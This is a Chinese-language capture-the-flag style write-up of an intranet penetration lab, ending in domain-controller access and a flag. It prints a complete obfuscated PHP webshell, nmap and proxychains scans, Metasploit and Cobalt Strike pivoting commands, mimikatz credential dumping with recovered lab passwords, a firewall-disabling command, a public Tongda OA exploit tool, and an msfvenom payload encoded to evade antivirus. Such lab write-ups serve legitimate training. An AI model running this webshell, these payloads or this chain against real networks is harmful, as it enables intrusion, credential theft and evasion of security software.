Write-Up - [渗透测试] 记一次暗月2020最新渗透测试项目七的内网渗透

Author：一条’小龍龙

Team：Traceless 网络安全团队

Data：2023/9/23

Description：暗月2020最新渗透测试项目七的内网渗透

环境配置

环境地址

链接：https://pan.baidu.com/s/1GbrW9l0lv22mh7BfltUPfA
提取码：long

靶场拓扑图

任务目标

最终目标即获取域控中的flag.txt文件内容

准备工作

1.将攻击机中的hosts文件中配置靶机域名解析（IP为靶机IP）

www.moonlab.com	192.168.3.30

2.三台靶机都需要登录一遍（用本地账户和域账户登录），这样后期猕猴桃才能抓取到账户密码hash

Write-Up

step 1 信息收集 - web

在排除其他非环境内的设备的IP后，确定靶机的IP地址

本机IP地址为 192.168.3.27

扫描内网主机设备 确定web靶机的IP

nmap -T4 -sn 192.168.3.0/24 --min-rate 100

扫描后得知，靶机IP为192.168.3.30

扫描开放的端口信息

nmap -T4 -sV 192.168.3.30 -p 1-65535

深度扫描该靶机的详细信息

nmap -T4 -sV -sC -A 192.168.3.30 -p 21,80,999,5985,6585 -oA attack-ports

访问robots.txt文件

访问SiteServer目录 发现跳转至登录页面

step 2 渗透测试 - web

因为网站装有防护软件，所以尽量不要爆破

在当前登陆界面，我们发现会有一个忘记密码的选项

我们通过该选项，看是否会有逻辑漏洞（如密码找回逻辑存在漏洞），通过该漏洞从而获取或修改用户密码

打开BurpSuite，等待抓包

猜测用户名为admin，点击下一步

将抓到的包放掉

随便输入一下，下一步

发现Answer=123该传参键值对，把123删掉后放包

此时，我们看到了页面出现了账号密码。说明该处存在账号密码找回逻辑漏洞

利用该账号密码，我们成功登陆了后台

step 3 上传webshell并连接 - web

一般来说，登陆后台后，首先就要看看有没有地方能上传文件，然后想尽办法上传webshell。或者找到能够修改网页内容的地方，添加上webshell即可。

这里，我们新建模板文件，在文件中写入webshell即可

在显示管理 --> 模板管理中，新建单页模板

内容如下

保存后 即可看到新加的webshell模板

点击模板名称webshell，即可跳转至改模板的URL地址

用冰蝎输入地址及密码即可连接

连接成功后如下所示

step 4 利用冰蝎反弹shell给MSF - web

我们点击反弹shell功能 输入以下内容

打开msf，进行一下操作

此时，我们在冰蝎 反弹shell 模块处点击 给我连

此时连接成功

step 5 提权与进程迁移 - web

获取相关信息

在获取系统权限后，我们对其进行了信息收集

得知了系统是64位，相关版本及补丁，IP地址等信息

查看ps进程

迁移到64位进程 并加载猕猴桃插件

migrate 780
load kiwi

step 6 利用猕猴桃获取系统账户hash - web

查看主机中有哪些用户

run post/windows/gather/enum_logged_on_users
creds_all

通过 creds_all我们得知了administrator账号的密码为!@#QWE123

step 7 MSF转CS

CS端

启动CS服务器

启动CS客户端

输入服务器IP、端口、账号及密码后，点击连接

新建监听器

MSF端

bg
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.3.27		//CS服务器地址
set LPORT 10000		//随意设置监听端口，需要和cs保持一致
set session 1	//设置需要用的SESSION
set DisablePayloadHandler true    //禁止产生一个新的handler
run

CS 上线

会话间隔设置为1

在会话交互中执行以下命令获取管理员密码hash明文

hashdump	
logonpasswords	

密码凭证处可以看到账号密码

step 8 添加路由并对内网主机进行探测

查看session，并回到192.168.3.30的主机控制台

添加路由

run post/multi/manage/autoroute
bg
route print

扫描内网10.10.1.0/24网段中存活的主机

use auxiliary/scanner/discovery/udp_sweep
set rhost 10.10.1.2-254 
run

发现主机10.10.1.130 还有一种方式可以通过arp获取

step 9 设置socks5代理并通过代理进行相关操作

设置socks5代理

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1080
run

配置 proxychains代理

使用代理扫描端口开放信息（扫了两次结果都一样，估计是有防火墙）

目标机禁用ping，绕过ping 进行特定端口扫描

proxychains nmap -sT -Pn 10.10.1.130 -p 21,22,80,443,445,135,110,3389 --min-rate 1000 --open

发现目前只能看到80端口开放了

edge浏览器配置SwitchyOmega扩展如下

应用该代理设置后即可访问

step 10 漏洞探测与利用 - oa

根据网页标题可知这个是通达OA网络智能办公系统，我们查找相关CMS漏洞

RCE利用工具地址

https://github.com/Al1ex/TongDa-RCE

proxychains python tongda_rce.py http://10.10.1.130

proxychains python tongda_shell.py http://10.10.1.130

用蚁剑连接失败，应该是被防火墙杀了

无妨，我们看看tongda_shell.py源码 给它修改一下

这里把base64解密后，写入到了404.php文件中

我们新建一个冰蝎的webshell php文件

把生成的文件内容复制一下

<?php @error_reporting(0);session_start();$key="1a1dc91c907325c6";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$H2C51=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$H2C51=$t($H2C51."");for($i=0;$i<strlen($H2C51);$i++) { $new_key = $key[$i+1&15];$H2C51[$i] = $H2C51[$i] ^ $new_key;}	}else{ $H2C51=openssl_decrypt($H2C51, "AES128", $key);}$arr=explode('|',$H2C51);$func=$arr[0];$params=$arr[1];class G1350V58{ public function __invoke($p) {@eval("/*Z4M14g6s68*/".$p."");}}@call_user_func/*Z4M14g6s68*/(new G1350V58(),$params);?>

打开编码工具对其进行base64加密

把加密后的内容跟之前的内容进行替换

再次运行后，使用冰蝎连接（密码是我们自己设的 pass）

连接成功 可以看到我们当前为系统权限，无需提权

step 11 信息收集 - oa

查看系统信息

net start #查看启动的服务

tasklist /svc	#开启的进程

ipconfig /all

netstat -ano

信息整理

oa服务器所在域为 attack.local

双网卡，两个IP分别为10.10.1.130和10.10.10.166

当前身份权限为system权限

存在安全防护软件，如 360 安全卫士，360 杀毒软件，windows firewall 等

step 12 免杀

上线前先kill Windows防火墙

NetSh Advfirewall set allprofiles state off

然后我们再指定扫描一下开放端口信息 之前110是扫不到的，现在可以了

制作MSF免杀木马

msfvenom -p windows/meterpreter/bind_tcp LPORT=5555 -e x86/shikata_ga_nai -i 15 -f csharp -o payload_bind.txt

打开生成后的shellcode复制一下

用掩杀2.0免杀生成exe可执行程序

将生成好的木马axr.exe并上传至目标主机C:\目录下

step 13 MSF、CS上线 - oa

打开MSF

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.1.130
set lport 5555
exploit

在冰蝎终端运行木马

MSF上线后，查看进程

getuid
ps
migrate 1964 (64位进程pid)
load kiwi 加载猕猴桃插件
creds_all

添加路由

run autoroute -s 10.10.10.0/24
run autoroute -p

上线CS

新建监听器oa 端口自定义

生成Windows 可执行程序（Stageless）

选择监听器oa 生成即可

MSF上传木马程序到目标主机C盘根目录下

进入shell，执行CS木马

CS端 点击会话交互

在下方beacon>处输入

connect 10.10.1.130 10001

CS成功上线

step 14 信息收集 - oa

查看网卡/IP

两个网卡，分别为10.10.1.130和10.10.10.166

发现该主机存在域

存在域attack

run post/windows/gather/enum_domain

run post/windows/gather/enum_logged_on_users		#登陆域的用户信息

net domain_controllers

查看DC 3389端口开放情况

step 15 查看hash密码

CS端抓取hash、明文，查看密码凭证

OA 账号为administrator，密码为!@#Q123

ATTACK账号位administrator，密码为!@#QWEasd123.

step 16 设置代理远程控制DC

在 proxifier上配置代理服务器

设置代理规则

打开cmd输入mstsc回车

输入IP地址10.10.1.130回车

拿下域控！

查看flag

flag is flag{moon-a81c3d94aa192d3f87ed9f2fffec04fc}